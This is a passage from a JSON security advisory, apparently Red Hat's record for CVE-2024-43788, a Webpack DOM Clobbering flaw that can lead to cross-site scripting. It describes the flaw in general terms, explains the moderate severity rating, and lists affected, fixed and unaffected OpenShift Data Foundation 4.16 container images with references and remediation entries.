"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2308193"
}
],
"notes": [
{
"category": "description",
"text": "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le"
],
"known_not_affected": [
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43788"
},
{
"category": "external",
"summary": "RHBZ#2308193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308193"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43788",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43788"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61",
"url": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986",
"url": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986"
},
{
"category": "external",
"summary": "https://research.securitum.com/xss-in-amp4email-dom-clobbering",
"url": "https://research.securitum.com/xss-in-amp4email-dom-clobbering"
},
{
"category": "external",
"summary": "https://scnps.co/papers/sp23_domclob.pdf",
"url": "https://scnps.co/papers/sp23_domclob.pdf"
}
],
"release_date": "2024-08-27T17:15:07.967000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-15T08:52:38+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8113"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
